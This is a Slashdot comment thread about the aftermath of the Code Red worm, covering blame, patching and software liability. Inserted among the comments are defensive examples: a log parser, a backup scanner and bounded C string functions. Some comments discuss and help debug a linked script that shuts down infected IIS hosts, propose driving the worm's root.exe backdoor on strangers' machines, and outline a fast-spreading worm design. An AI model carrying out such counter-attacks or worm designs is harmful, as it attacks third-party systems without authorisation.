  258. Wow by indecision · · Score: 1
    I just grepped my lab's httpd logs for codered attempts, and I came up with an amazon.com.br server, and a bank!

    This is scary. Really scary.

    --indecision

    PS Anyone want some books? And do any of you know where I can buy a small caribbean island by banker's draft?
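    As an added example (not code from this thread), here is the grep the comment above describes done properly: a small Python parser that pulls Code Red probes out of Apache combined-format access logs, tells the 'N'-padded (Code Red I) and 'X'-padded (Code Red II) request lines apart, and lists the probing hosts, each of which is an infected IIS box whose admin could be notified. The log lines are constructed; the worm's request line is shortened and its encoded payload left out.

```python
import re
from collections import Counter
from typing import Dict, List, NamedTuple

# Constructed Apache "combined" log lines (not real traffic). A Code Red
# probe shows up on Apache as a GET for /default.ida with a long filler
# query string; the filler is cut short here and the shellcode part omitted.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2001:10:15:01 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 291 "-" "-"
192.0.2.17 - - [04/Aug/2001:10:16:44 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 291 "-" "-"
10.0.0.5 - - [04/Aug/2001:10:17:09 -0500] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 291 "-" "-"
198.51.100.9 - - [04/Aug/2001:10:18:30 -0500] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/4.0"
203.0.113.4 - - [04/Aug/2001:10:19:02 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 291 "-" "-"
203.0.113.4 - - [04/Aug/2001:10:19:03 -0500] "GET /default.ida?YYYY HTTP/1.0" 404 291 "-" "-"
"""

# Apache combined log: client, identd, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


class Probe(NamedTuple):
    ip: str
    timestamp: str
    variant: str
    status: int


def classify(path: str) -> str:
    """Return the worm variant a request path suggests, or '' if it is not a probe.

    Code Red I padded its overflow with 'N' and Code Red II with 'X'; that
    well-known difference in the request line is the only signal used here.
    """
    if not path.lower().startswith("/default.ida?"):
        return ""
    query = path.split("?", 1)[1]
    if query.startswith("N"):
        return "CodeRed-I"
    if query.startswith("X"):
        return "CodeRed-II"
    return "default.ida-other"   # same target file, unknown padding


def parse_probes(log_text: str) -> List[Probe]:
    """Extract every /default.ida probe from combined-format log text."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue            # malformed or non-combined line, skip it
        variant = classify(m.group("path"))
        if variant:
            probes.append(Probe(m.group("ip"), m.group("ts"), variant,
                                int(m.group("status"))))
    return probes


def summarize(probes: List[Probe]) -> Dict[str, Counter]:
    """Count probes per source host and per worm variant."""
    return {
        "by_source": Counter(p.ip for p in probes),
        "by_variant": Counter(p.variant for p in probes),
    }


def infected_sources(probes: List[Probe]) -> List[str]:
    """Unique probing hosts, sorted; each one is itself an infected IIS server."""
    return sorted({p.ip for p in probes})


if __name__ == "__main__":
    found = parse_probes(SAMPLE_LOG)
    stats = summarize(found)
    print("probes:", len(found))
    print("by variant:", dict(stats["by_variant"]))
    for ip, n in stats["by_source"].most_common():
        print(f"{ip:16} {n} probe(s)")
    print("hosts whose admins could be notified:", infected_sources(found))
```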

  259. But how many know that? by wirefarm · · Score: 3, Interesting

    You and I know that you don't need your proof of purchase, but is it inconceivable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - thinking that MS will somehow *know* and track them down?

    --
    -- My Weblog.
    1. Re:But how many know that? by Phroggy · · Score: 1

      You and I know that you don't need your proof of purchase, but is it inconceivable that the bulk of people using a bootleg copy would feel uncomfortable going to Microsoft.com - thinking that MS will somehow *know* and track them down?

      Sometimes I fear that after visiting their Web site, Microsoft will track me down even if I'm not pirating their software.

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  260. Script Error by UVABlows · · Score: 2, Informative

    The author intended for it to shut down IIS first, then the remote machine, but he is actually issuing the IIS shutdown command twice. Examine:

    my $resp = $ua->request ($iis_stop_req);
    if ($resp->is_success) {
    my $server_stop_req = [...]
    $resp = $ua->request ($iis_stop_req);

    That second request should be $server_stop_req instead of $iis_stop_req. Now to fiddle with httpd.conf..... WOW SLASHCODE SUCKS, I couldn't submit this at first because it was considered a junk character post. That filter really sucks, I've triggered that so many times trying to do an actual post.

    --

    <high-level position here>
    <name of stupid small company here>

    1. Re:Script Error by B-o-K · · Score: 1
      What about these Apache errors:
      Name "main::server_stop_req" used only once: possible typo at /usr/local/www/htdocs/default.ida line 46.
      Can't call method "method" on an undefined value at /usr/local/lib/perl5/site_perl/5.005/LWP/UserAgent.pm line 163.
      ?!

      I've changed
      my $resp = $ua->request ($server_stop_req);
      into
      my $resp = $ua->request ($iis_stop_req);
      Maybe it works now... can't seem to shutdown a host right now.
  261. Re:Next step: automate it! by Mike+Hicks · · Score: 2
    C:\>ftp -h
    [snip]
    -s:filename Specifies a text file containing FTP commands
    Looks like you just have to find an FTP server that has the program.
  262. Re:Not the mess they made... by ZxCv · · Score: 1

    I think more of the point is to keep these wonderful Slashdot editors in check... I can't remember ever seeing a story regarding Microsoft that put them in anything but a negative light-- even if it wasn't completely justified, as in this case.

    The editors/story posters/whatever are always going to have the ability to put a little hint of MS bashing right there at the top of the page, so there has to be at least one person willing to try and set things straight...

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  263. Re:Blame people that ENCOURAGE this... by tcc · · Score: 2


    Microsoft encourages the thinking and then people just do it because "Microsoft says it's secure" or "Microsoft says it's stable" and so forth.

    And I guess that Linux is better in that perspective? How many times do you see Linux people doing the EXACT SAME THING by saying it's more secure and stable than Windows? Wouldn't that bring the exact same reaction? "I'll install a Linux/Apache server because it's more secure" but what if that person has the 0-patching thing in mind already? It's not FORGED by Microsoft alone, that's my point... both platforms do the exact same thing on that issue.

    I don't want to start a Linux vs Windows war because it's totally useless, and I surely don't want to be seen on the M$ side :), but my point is still valid, and the one who moderated that as a troll is probably another zealot who can't understand and saw his beloved platform scratched by my comments.

    In the end, any OS needs patching, and people need to be educated about it. Linux or Windows or Mac, I don't care; seeing my RD light on my modem still flashing like hell this long after that virus (and titles like aftermath) got announced, THAT worries me a lot.

    --
    --- Metamoderating abusive downgraders since my 300th post.
  264. Spot the flaw in the logic by Rubik+Penguin · · Score: 1
    For many IIS web server admins, reformatting the hard disc won't work. Why? ....

    Because all the pages of their website are in C:\InetPub, so they will back that up first and restore it after the re-install.

    Now where was that root.exe file? ....
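    The restore trap described above can be checked for mechanically. As an added example, not from this thread: a Python walker that scans a saved copy of an InetPub tree before it is restored and flags root.exe (the cmd.exe copy the worm leaves in /scripts) plus any other loose executable under a scripts directory. The "no loose executables in scripts" rule and the sample tree are assumptions made for the example.

```python
import hashlib
import os
import tempfile
from typing import List, Optional

# Constructed stand-in for the body of the dropped root.exe (a real one is a
# copy of cmd.exe); used both to build the sample tree and to check hashing.
SAMPLE_CMD_BODY = b"MZ fake cmd.exe body"


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of(path: str) -> str:
    """Stream-hash a file so large backups don't need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_worm_leftovers(backup_root: str,
                        cmd_exe_hash: Optional[str] = None) -> List[str]:
    """Walk a saved web root (e.g. a backup of C:\\InetPub) and return the
    relative paths of files that must not come back with a restore:

      * any file named root.exe, the copy of cmd.exe the worm drops in /scripts;
      * any other .exe/.dll under a 'scripts' directory (assumed policy: a CGI
        directory restored from an image carries no loose executables).

    If the hash of the system's own cmd.exe is supplied, a root.exe whose
    hash matches is reported as a confirmed copy rather than just a bad name.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(backup_root):
        rel_dir = os.path.relpath(dirpath, backup_root)
        parts = {p.lower() for p in rel_dir.split(os.sep)}
        for name in files:
            lower = name.lower()
            rel = os.path.normpath(os.path.join(rel_dir, name)).replace(os.sep, "/")
            full = os.path.join(dirpath, name)
            if lower == "root.exe":
                tag = "root.exe"
                if cmd_exe_hash and sha256_of(full) == cmd_exe_hash:
                    tag = "root.exe (cmd.exe copy)"
                findings.append(f"{tag}: {rel}")
            elif "scripts" in parts and lower.endswith((".exe", ".dll")):
                findings.append(f"executable in scripts dir: {rel}")
    return sorted(findings)


def build_sample_backup() -> str:
    """Create a constructed InetPub-like tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="inetpub_backup_")
    layout = {
        "wwwroot/index.html": b"<html>hello</html>",
        "wwwroot/images/logo.gif": b"GIF89a",
        "scripts/root.exe": SAMPLE_CMD_BODY,      # the dropped backdoor copy
        "scripts/upload.dll": b"MZ some isapi",   # loose executable in the CGI dir
        "scripts/form.pl": b"#!perl",             # a script, not flagged
    }
    for rel, body in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(body)
    return root


if __name__ == "__main__":
    backup = build_sample_backup()
    print("by name only:")
    for line in find_worm_leftovers(backup):
        print("  ", line)
    print("with the cmd.exe hash supplied:")
    for line in find_worm_leftovers(backup, sha256_bytes(SAMPLE_CMD_BODY)):
        print("  ", line)
```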

  265. Re:Warhol Worm proposed: 15 minutes to total infec by SuiteSisterMary · · Score: 2

    And at that point, you program the worm to be self-modifying. Target some 'known' servers. Infect them with targeted worms. On some condition (probably date) each worm (let's say N is the total number of preinfected systems) will start scanning a group of addresses. If V represents the total number of IPv6 addresses, each host will have a group of exclusive addresses, E, E being V/N addresses. Whenever a host finds a new victim, it will give that victim a range of addresses in E to go through, after which the 'subhosts' will attack at random. The host will then start scanning the next address past the block it just doled out.

    --
    Vintage computer games and RPG books available. Email me if you're interested.
  266. Re:Who to blame: MS or Admins? by Capt.+Beyond · · Score: 2, Interesting

    You're wrong. It's the virus writers' fault.

    --
    -- "Perceptions create reality. By changing your perceptions you change your reality."
  267. Micro$oft is so goddam disingenuous... by talks_to_birds · · Score: 1
    [disingenuous: (adj.) not straightforward; crafty.]

    ...that I just about want to puke.

    • "Tool to eliminate the obvious effects of the Code Red II worm"

      "* THE TOOL ONLY ELIMINATES THE EFFECTS OF THE CODE RED II WORM. IT DOES NOT ELIMINATE THE EFFECT OF OTHER VARIANTS OF THE WORM."

      "* IF THE WORM HAS INFECTED YOUR SYSTEM, YOUR SYSTEM HAS BEEN OPENED TO ADDITIONAL FORMS OF ATTACK. THIS TOOL ONLY ELIMINATES THE DIRECT EFFECTS OF THE WORM. IT DOES NOT ELIMINATE ANY ADDITIONAL DAMAGE THAT OTHER ATTACKS MAY HAVE CAUSED WHILE YOUR SERVER WAS INFECTED."

    Obvious effects..? Other variants..? If (for crissakes, IF?) the worm has infected..?

    Those are just minor issues, and certainly not Micro$oft's problem, let alone Micro$oft's fault.

    Remember, Micro$oft's EULA makes them absolutely not responsible for anything.

    If Micro$oft had *any* integrity, its core message would be: "You're totally screwed through our misfeasance."

    Instead, it's "You're totally screwed, and we're off the hook entirely."

    Remember: "We're Micro$oft, we're as big as they get, and we don't care because we don't have to!"

    t_t_b

    --
    I'm on PJ's "enemies" list! Are you?
  268. Re:Microsoft made this mess? Huh? by david.johns · · Score: 1
    Just to point out something others have pointed out before:

    AFAIK, the patch doesn't work under certain conditions. (URL redirection.)

    With that in mind, there is still a problem - the patch itself is inherently not 100% effective. We are not trying, in general, to limit the worm - we are trying to eliminate it. I'm sure there are some people for whom the URL redirection is critical, and, therefore, the worm is simply an annoyance.

    Just my usd .02. ;)
  269. Re:Not the mess they made... by ColdGrits · · Score: 1

    You mean like Microsoft itself (infected at hotmail and at Redmond) ? :-)

    --
    People should not be afraid of their governments - Governments should be afraid of their people.
  270. Aftermath? by dsfox · · Score: 1, Redundant

    Is code red over? I'm still seeing as many hits
    as I ever did...

  271. Well that's not very nice... by glenebob · · Score: 0, Troll
  272. Re:Not the mess they made... by Anonymous Coward · · Score: 0

    If there's a hole in your roof, do you blame the rain when you get wet?

  273. Liability for software defects by jeffy124 · · Score: 5, Interesting

    There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles. Some good examples where this would apply include some major items in software bug history: the AT&T 800 service outage, the hospital radiation treatment software controllers that killed people from overexposing them to radiation, and of course Code Red. CNN interviewed Bruce Scheneir (sp?) about this issue and he is all for holding software makers liable. Last week I tried submitting those stories to slashdot, yet the editors don't think it's an issue and won't post it, despite the fact that if liability someday hits the software market, it hits OSS people too.

    --
    The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
    1. Re:Liability for software defects by Rubik+Penguin · · Score: 1
      Not sure if anyone really has a case against Microsoft itself. They did release a patch and advise not installing IIS unless you want to run a webserver, and disable the index server unless you need it.

      Maybe all the home users who bought a "Personal" computer with IIS preinstalled and enabled by the supplier have a case against their supplier. Is it reasonable to describe a computer running IIS as "Personal"?

    2. Re:Liability for software defects by kalamazoo904 · · Score: 0, Offtopic

      Amen, brother. I submitted that story too, and got rejected too.

      --
      Your friendly neighborhood nitpicker
    3. Re:Liability for software defects by Anonymous Coward · · Score: 0
      In 5 years that could become a SERIOUS economic issue for the US; maybe German software will become the avant-garde (like German engineering is thought of now), or Japanese software will be the highest quality (like Japanese steel is now). And suddenly we'll find ourselves out of the software market like we're out of the car market and out of the electronics market.

      See... kind of like natural selection! We will then sort it out. But getting everyone to change when we are making millions will be hard! A law will just make people try to route around the law.

    4. Re:Liability for software defects by peccary · · Score: 1

      If you want to avoid liability, you can always publish anonymously.
      Under traditional law (pre-EULA BS) products that are sold have an implicit warranty of fitness. Gifts and "found objects" do not necessarily.
      I've been programming for a couple of decades now, and this has been an issue for the entire time. But on balance, I think it would be a good thing.

    5. Re:Liability for software defects by Ratbert42 · · Score: 1

      I think it would be hard to find Microsoft liable in court. They did the closest thing to issuing a recall (a patch) that they were capable of.

      What could they have done better? E-mail every registered NT/2000 user to warn them? Have IIS automatically check for updates? Force users to install the critical update service? I'd be comfortable with all of those.

    6. Re:Liability for software defects by tswinzig · · Score: 3, Insightful

      There's been talk on places like CNN and CNet about software makers being held liable for serious defects in much the same way Ford and Firestone are for their recent tire troubles.

      The major difference in this case, and the reason that any case against Microsoft would ultimately lose (at least for the Code Red attack), is that Microsoft released a patch well before Code Red came out.

      Ford and Firestone, on the other hand, tried to cover it up for as long as possible.

      --

      "And like that ... he's gone."
    7. Re:Liability for software defects by Phroggy · · Score: 1

      The GPL doesn't restrict what you can do with software the way other EULAs do. The software is copyrighted, and you can do what you'd like with it while still adhering to copyright law (fair use, don't distribute copies or derivatives) regardless of the GPL. The GPL grants you certain additional rights, such as the right to distribute derivative works, under the condition that all derivative works be licensed under the GPL, and that the source code be made available to anyone who has received a binary. If the GPL were declared null and void, you'd still be restricted by copyright - and tell me, do you really think software copyrights will ever be done away with? After all, isn't Office XP copyrighted?

      --
      $x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
    8. Re:Liability for software defects by fava · · Score: 1
      Unfortunately when you buy software you are not actually buying the software, you are only buying a license to use the software.

      If you were buying the software then various consumer protection laws come into effect. If you are licensing the software then the license can create its own terms. Of course the software makers have put very favorable terms into the license.

      If the courts were to decide that the licenses are a legal fiction and what really has taken place was a sale, then we will see some action in the form of lawsuits and an improvement in software quality.

      If the courts were to decide that these licenses were invalid, how would that affect the GPL? It's not a sale since no money changed hands, but if licenses are invalid the viral aspects of the license would be invalid. In essence you have taken the GPL and turned it into the BSD license. I don't know if I like that.

  274. Microsoft made this mess? Huh? by tswinzig · · Score: 3, Insightful

    Michael writes, So, Microsoft has given you a mop to clean up the mess they made.

    No, Microsoft gave us a mop to clean up after the mess the Code Red author(s) made.

    You see, more than a month before Code Red came out, Microsoft gave us the patch for the security breach that allowed Code Red to take place.

    --

    "And like that ... he's gone."
    1. Re:Microsoft made this mess? Huh? by JoeBuck · · Score: 2

      Microsoft did not make the mess by just having a security hole. Security holes happen. The reason Code Red exploded, and the reason it's taken so long for everyone to patch their systems, is because the lion's share of infections are to systems where the owner didn't even know that he or she is running IIS.

      Now, even this kind of mistake happens and is made by others, which is why an unpatched Red Hat 6.2 box will survive on the open Internet for less than 15 minutes before being rooted. But Microsoft made a critical error a month ago, when Code Red I broke, by not urging all users to check whether they intend to run IIS or not, and if not, to turn it off.

      Finally, Microsoft is to blame for releasing a security tool at this late stage that will not do the job. By now, the bad guys have used their lists of IP addresses of infected systems to install back doors on tens of thousands of systems. These back doors will survive Microsoft's mop. But telling the truth -- that the only safe thing is to reformat the system and start all over again -- will look really bad and cost the users a lot of time and money. So they mumble something about checking the CERT advisory to cover their asses legally, and then they do this irresponsible thing.

  275. How to use Perl and Lotus Domino Server by scotpurl · · Score: 2

    Lotus Domino can use Perl. Off-topic, I know, but this is to help out folks.

    1. Make sure your server is not using IIS (since life is easier that way).
    2. Install Perl from perl.com. You don't need the ISAPI stuff. Make sure perl is in the path.
    3. add a file association on the OS level for .ida files pointing to the perl interpreter. (copy what you see for .pl files)
    4. create a URL -> URL mapping of /default.ida to /cgi-bin/default.ida
    5. place the default.ida script in your Lotus\Domino\Data\domino\cgi-bin directory.
    6. restart the domino server.
    7. Test it with http://myserver/default.ida?one_arg

    Not all of us use Apache, so save the flames. Some of us have to stick with what the company we work for requires us to use.

  276. Unforgivable! by Remote · · Score: 1

    Way to go, michael!!! Putting a link on /. frontpage to a script that shuts down machines.

    You guys have crossed a dangerous threshold here (I'm assuming this is the first time). My guess is that it will take people quite a while to forget this.

    And, no, my machine was not shut down.

  277. Re:Not the mess they made... by ZxCv · · Score: 0, Flamebait

    This deserves a -1,Retard.

    I've been using different variants of UNIX for about 10 years and Windows for about 8. And as a competent professional, I know how completely absurd it is to assume that because someone is using Windows, they have no computer savvy.

    Think a little bit before you post next time...

    --

    Perl - $Just @when->$you ${thought} s/yn/tax/ &couldn\'t %get $worse;
  278. Start blaming Microsoft again by leonbrooks · · Score: 5, Interesting

    As has been so often pointed out, many of Microsoft's fixes also often break things, and they have a nasty habit of occasionally including "improvements" that eventually dead-end you and don't become obvious for some time - like well after it's too late to back out the patch. These features combine to make many admins that I know highly reluctant to install Microsoft's fixes.

    Apache is more of a monoculture (about twice as much) than IIS, yet Apache worms this bad generally don't happen because:

    * Apache is not design-insecure, as is practically every Microsoft product - for example, Exchange's security goolies are still flapping in the breeze (have to be due to fundamental design) and I expect to see another CodeRed appear targeted for it Real Soon Now;

    * If you want active facilities, you have to install them - or at least switch them on - because they either don't come with the base server (e.g. PHP) or aren't available in default pages to exploit (e.g. XSSI);

    * The active facilities can only touch as much as the webserver can touch. Users named ``apache'' or ``nobody'' generally don't have write access to a great deal of the file system;

    * Even though Apache as such is a monoculture, there is great variety between Apaches. They run on a wide variety of CPUs and OSes. Your binaries might be in /usr/bin, /usr/local/apache/bin, /opt/apache/bin or any one of a number of places; your web pages might be in /home/httpd/html, /var/www/html, /usr/local/apache/html or anywhere the admin chose to put them. It might be running chrooted, it might or might not have zero or more of a great number of modules enabled, and so on;

    * Apache adheres to standards; a lot of IIS holes have been in Microsoft special features;

    * Apache's code (including most common add-ons) has been examined by a wide variety of eyes using a wide variety of techniques.

    Using Microsoft software costs you all of these advantages and more.

    --
    Got time? Spend some of it coding or testing
  279. Who to blame: MS or Admins? by slasho81 · · Score: 2, Interesting

    People here suggest that admins are to blame for the Code Red ongoing catastrophe because they took the responsibility to maintain a server.

    Some posts accuse them of letting MCSEs handle servers, which only mighty hackers with years of experience should touch.

    I think it's stupid. There aren't enough admins that fit the definition of experienced hackers. That's why organizations buy server software to handle 'serving'. They hire admins to operate the server, not to code-and-compile or patch every morning. It's true that admins are the ones responsible for patching software, but you can't expect all servers to be patched the moment a patch is released; hell, MS servers failed to patch on time.

    The software is not secure. Whose negligence is it?

  280. Re:Actually: authors of strncat() MAN PAGE and get by csbruce · · Score: 2

    Make your own functions. I use:

    void StrCpy( char *dest, const char *source, long destSize );

    void StrCat( char *dest, const char *source, long destSize );

    etc. E.g.:

    char str[STD_LINE_SIZE];
    StrCpy( str, blah, STD_LINE_SIZE );
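    The post above only gives the prototypes. Below is an added example, not csbruce's own code, of what such size-bounded routines look like when written out, with the convention his signatures imply: destSize is the total size of the destination buffer (not the number of characters to append, which is what strncat's n means and what trips people up), the result is always NUL-terminated, and the return value lets the caller notice truncation. STD_LINE_SIZE is set to a small value here only so that truncation is visible; the name build_line and the buffer size are my assumptions.

```c
#include <stdio.h>
#include <string.h>

#define STD_LINE_SIZE 16   /* small on purpose so truncation is visible */

/* Bounded copy. destSize is the TOTAL size of dest (unlike strncat's n,
 * which is the number of characters to append). Always NUL-terminates
 * when destSize >= 1, truncating the source if it does not fit. Returns
 * the number of characters stored, excluding the NUL, so a caller can
 * compare it with strlen(source) to detect truncation. */
size_t StrCpy(char *dest, const char *source, size_t destSize)
{
    size_t i = 0;
    if (destSize == 0)
        return 0;
    while (i < destSize - 1 && source[i] != '\0') {
        dest[i] = source[i];
        i++;
    }
    dest[i] = '\0';
    return i;
}

/* Bounded append with the same convention: destSize is the total size
 * of dest. Returns the final length of dest. If dest is not terminated
 * inside destSize it is terminated at the end rather than scanned past. */
size_t StrCat(char *dest, const char *source, size_t destSize)
{
    size_t len = 0;
    if (destSize == 0)
        return 0;
    while (len < destSize && dest[len] != '\0')
        len++;
    if (len == destSize) {          /* unterminated dest: repair, append nothing */
        dest[destSize - 1] = '\0';
        return destSize - 1;
    }
    return len + StrCpy(dest + len, source, destSize - len);
}

/* Typical use (hypothetical helper): build one line in a fixed buffer
 * from two parts. Returns 1 if either part had to be truncated, else 0. */
int build_line(char *out, size_t outSize, const char *a, const char *b)
{
    size_t n = StrCpy(out, a, outSize);
    int truncated = n < strlen(a);
    size_t m = StrCat(out, b, outSize);
    if (m - n < strlen(b))
        truncated = 1;
    return truncated;
}

int main(void)
{
    char str[STD_LINE_SIZE];
    int t = build_line(str, sizeof str, "GET ", "/default.ida?XXXXXXXXXXXX");
    printf("%s (truncated=%d)\n", str, t);
    return 0;
}
```

    Passing sizeof the array (or the same constant used to declare it) at every call site is the whole point: the functions can then never write past the buffer no matter what the source string contains, and the return value tells you when input was too long instead of silently dropping it.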

  281. M$ din't do crapola. They made it. by TrollMaster5000 · · Score: 0

    Blame M$ for making a shitty system that ALLOWS, Yes M$ LUSERS, ALLOWS the worm to execute itself over & over. The OS simply executes the programs itself. This causes virii, worms, and other goodies to work/spread. So Yes. I blame M$. I blame them for making an OS that is virtually worthless when it comes to security.

  282. Someone needs to post that story! by Controlio · · Score: 1

    That was a good read. There are a lot of assumptions that I'm skeptical about, and I would love to read the reaction of the more skeptical of the /. crowd to see how realistic the assumptions really are.

    Not that I haven't submitted a good story or two in my day that has been denied... but this one really piqued my interest, especially given the recent outbreak of worms. Until someone gives the internet the pill I give my dog all the time, we need to start planning ahead before this type of thing really does cripple the internet.

    Personally, I can imagine much worse attacks than the one listed in that article... all it would take is a good firmware flaw in a few key internet routers, and tahdah, the internet slinks along at the once familiar speed of 28.8kbps. Not that I'm a conspiracy theorist or anything. :)

  283. Bad MS Downloads by Anonymous Coward · · Score: 0

    The Red Worm fix does not require a reboot -- well, according to one admin. It turned out that the site with the Red Worm fix often quits downloading partway through the file -- and the resulting partial file does not always give any error windows when it is run, so people think they have patched their machines.

  284. Re:FUD ALERT by sqlrob · · Score: 2, Informative
    Second, that FUD about service packs re-breaking the OS is just garbage. Please give me ONE example, JUST ONE, of a service pack opening up new holes for ANY WINDOWS OS, 3.1 and up. You can't because you are a paid basher talking out of your ass.

    Ask and ye shall receive:

    NT SP 5 or 6 (sorry, don't remember which) broke the TCP/IP sequencing algorithm, making it vulnerable to spoofing.

    The fix for security holes in Exchange Web broke the server (twice - took 'em till the third try)

    My job is programming Windows boxes, so no, I'm not a paid basher.

  285. Remind me again... by reemul · · Score: 3, Informative

    Which system did Ramen infect? I'm pretty sure it wasn't a Microsoft platform.

    Software has bugs. They get found, they get fixed, move on. The only reason MS exploits get more press and greater impact than Linux exploits is that MS is on more boxes. If, as you claim to desire, Linux takes off, the same people shrieking to the sky about what a crappy system MS has will be defending Linux and saying, hey, it happens. Stupid users who don't patch aren't Bill Gates' fault.

    It's just the same crap from folks who attack NT as buggy and crash-prone (which is almost always due to 3rd-party drivers) while extolling the stability of Linux, which they keep rebooting because they have wonky drivers. A ha! they say, I was using a beta driver, it's to be expected. Well, that driver has been in beta for over a year, that's as good as it gets. Software has bugs, move on.

    You want to ignore your own faults and start a religious war? I'm betting you can get some cheap flights to Tel Aviv right now. Knock yourself out.

    -reemul
    who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working

    --
    You're just jealous 'cuz the voices talk to *me*
    1. Re:Remind me again... by Anonymous Coward · · Score: 0

      You mean like these?

  286. Why not simply uninstall IIS? by Robber+Baron · · Score: 1
    it also gives you an option to permanently disable IIS.

    Why not simply uninstall IIS? I'm running 2k at home and IIS is part of the default install config. It was also one of the first things to go.

    --

    You're using her as bait, Master!

    1. Re:Why not simply uninstall IIS? by hearingaid · · Score: 2

      the permanent-disable function presumably would override future installs.

      some M$ things install other M$ things automatically. I'm hoping that the permanent disable function would detect other programs trying to install IIS and stop them.

      I'm probably too optimistic...

      --

      my old sig used to be funny, but then slashcode ate it and now it's not funny anymore

  287. No Such Luck by mstyne · · Score: 1

    Been getting CR hits like wildfire, so I figured I'd give this a shot (until recently I had a default.ida file that refreshed to someone's page whom I don't care for very much -- I'm sure all the hits referenced from my machine confused him). However, after watching the logs for a little and ping'ing and lynx'ing the "offending" box, it would seem that the script doesn't do jack. Maybe it did at one point, but not anymore.

    --
    mstyne: real name, no gimmicks
  288. Re:Not the mess they made... by subsolar2 · · Score: 1
    Hmmm, that's totally useless to me ... since I don't run windows and so can't run windows media to view it.

    Anybody kind enough to provide a transcript for us loser linux users??

  289. Re:Not the mess they made... by Anonymous Coward · · Score: 1, Informative

    Yep, same thing at my company. We are an MS Solution provider / consulting firm. 40% of NT servers affected!!! LOL...

  290. Next step: automate it! by Quixote · · Score: 3, Redundant

    OK, who can write a perl CGI script that will, on connection from an infected host, send the appropriate commands to root.exe; download the tool; and run it?
    For extra credit: reboot twice, as Micro$oft recommends.
    For a straight A: fix the problem forever by replacing NT with Linux...

    1. Re:Next step: automate it! by thing12 · · Score: 2

      That's almost what the link at the end of the story does. It does everything but patch the infected host. It would be funny as hell to just disable IIS on every infected box that connects to yours.

    2. Re:Next step: automate it! by IronChef · · Score: 2


      It would be nice to alter the last one to point to a page that says, "Hey Chester, you've been compromised, and your computer has been attacking mine lately. Install this patch or turn off the web server, you chucklehead."

    3. Re:Next step: automate it! by Anonymous Coward · · Score: 0

      my dog had worms, but I brought it to the vet. Maybe people should do that with Microsoft. Get rid of those nastily worms.

  291. Re:FUD ALERT by analog_line · · Score: 4, Funny
    You can't because you are a paid basher talking out of your ass.

    Oh gods, someone PLEASE tell me how I could get a job bashing Microsoft. I do it for free all the time.

    And here's a security hole for you. Service Pack 6 (that's the original Service Pack 6, not 6a) not allowing anyone but Administrators to access the TCP/IP stack. You think that possibly some of Microsoft's vaunted legions of crack QA people might've possibly tried testing the service pack as something other than an Administrator?

  292. If you're concerned become a vigilante by gad_zuki! · · Score: 2

    There's a nice fake webserver you can run on unix or windows platforms that launches a warning html page on the attacker's machine. Why let the "authorities" run the net, especially when the code red attackers are asking you for default.ida - whatever you make that to be.

    Link:

    http://www.dynwebdev.com/codered/

  293. Gotcha!!! by Anonymous Coward · · Score: 0
    Well now, they probably figured that anybody dense enough to run NT or Win 2K, out of the box, would be dense enough to click on the link! Do you double-click on every e-mail attachment too?

    Has it never occurred to you that you may be too dense to run Windows? One thing that Code Red has taught is that it really is difficult to run Windows, at least, without looking like a gibbering fool.

  294. Stop complaining about Microsoft's security holes. by Anonymous Coward · · Score: 0

    Are you running Sendmail? Maybe an old version which came with your old CD? You shouldn't be blaming Microsoft for anything.

  295. Re:Anybody who thinks... by Anonymous Coward · · Score: 0, Flamebait

    Oh no. 132 probes in a 24 hour period from dial ups!

    Sounds like a big emergency!

    I'm surprised you can even get online to post this!

  296. Re:Not the mess they made... by sheldon · · Score: 4, Insightful

    Just a correction... Apache does *NOT* run MUCH more of the web than does IIS.

    You just have to go look at the Netcraft surveys to understand. In the past they've pointed out that half of SSL enabled sites run IIS. Then about a month or two ago they started trying to identify individual machines and found the IIS/Windows combination again on half of the overall web.

    What we do know is that Apache is used in many more cohosting situations. Jimmy and Susy set up a web page and pay $0-10/month for it. Is it a significant thing that companies providing low price service with no service level agreements use a free OS/web server? I don't think so, but you be the judge.

    Two other points:

    Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

    You should *ALWAYS* test patches and new releases before installing them into a production environment. That applies not only to Microsoft, but also to Linux, Sun, HP, Oracle, Peoplesoft, everything!

    In our testing service packs don't usually break apps. But they do have a tendency to break drivers or low-level hardware monitoring tools provided by the manufacturer. Is this surprising? No. Again we have the same problems on our Unix servers with OS patches.

  297. Re:Not the mess they made... by Nater · · Score: 1

    His point is that the patch was available and public BEFORE code red.

